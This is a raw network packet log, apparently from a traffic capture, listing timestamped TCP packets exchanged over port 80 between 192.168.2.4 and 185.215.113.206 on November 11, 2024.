                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886796951 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886809111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886820078 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886831045 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886842966 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886847019 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886847019 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886868000 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886868000 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.886900902 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887758017 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887772083 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887782097 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887794971 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887801886 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887813091 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887814045 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887826920 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887836933 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887840033 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887852907 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887864113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887875080 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887885094 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887885094 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887887001 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887893915 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887901068 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887939930 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.887963057 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888654947 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888667107 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888679028 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888689995 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888700962 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888711929 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888716936 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888716936 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888725042 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888726950 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888742924 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888755083 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888766050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888777018 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888788939 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888788939 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888788939 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.888823986 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889624119 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889636993 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889647961 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889658928 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889671087 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889686108 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889691114 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889698982 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889699936 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889713049 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889724016 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889735937 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889743090 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889746904 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889760017 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889765024 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889786959 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.889786959 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890505075 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890518904 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890530109 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890537977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890542030 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890563011 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890652895 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890835047 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890847921 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890858889 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890873909 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890883923 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890896082 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890897989 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890916109 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890924931 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890929937 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890933990 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890943050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890959978 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890960932 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890974998 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890988111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890999079 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.890999079 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891014099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891015053 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891035080 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891076088 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891927958 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891941071 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891952038 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891963005 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891971111 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891973972 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891988039 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.891999006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892010927 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892020941 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892020941 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892025948 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892039061 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892050028 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892051935 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892064095 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892076015 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892083883 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892092943 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892122984 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892905951 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892918110 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892927885 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892939091 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892950058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892961025 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892961025 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892972946 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892982006 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892986059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.892997980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893011093 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893022060 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893030882 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893030882 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893033981 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893042088 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893076897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893076897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893831968 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893846035 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893856049 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893872023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893877029 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893882990 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893888950 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893892050 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893903017 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893912077 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893925905 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893937111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893949032 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.893949032 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894001961 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894001961 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894505978 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894519091 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894531965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894543886 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894555092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894566059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894566059 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894577980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894597054 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894598007 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894610882 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894622087 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894634008 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894635916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894635916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894645929 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894658089 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894669056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894675016 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894675016 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894712925 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.894712925 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895591974 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895602942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895615101 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895627975 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895636082 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895639896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895647049 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895653963 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895656109 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895667076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895678997 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895689964 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895693064 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895701885 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895710945 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895715952 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895729065 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895740986 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895755053 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895755053 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.895792007 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896512985 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896526098 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896536112 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896547079 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896558046 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896565914 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896569967 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896581888 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896589041 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896589041 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896594048 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896605968 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896614075 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896617889 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896630049 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896641970 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896650076 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896653891 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896704912 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896704912 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.896704912 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897370100 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897382975 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897392988 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897403955 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897416115 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897427082 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897443056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897454023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897464991 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897473097 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897473097 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897473097 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897478104 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897490978 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.897526979 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898128033 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898139954 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898152113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898159981 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898164034 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898175955 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898188114 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898195028 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898201942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898212910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898230076 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898230076 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898230076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898243904 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898245096 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898256063 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898268938 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898279905 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898291111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898302078 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898308992 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898308992 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898317099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.898328066 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.899125099 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.899137974 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.899147987 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.899158001 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.899169922 CET8049753185.215.113.206192.168.2.4
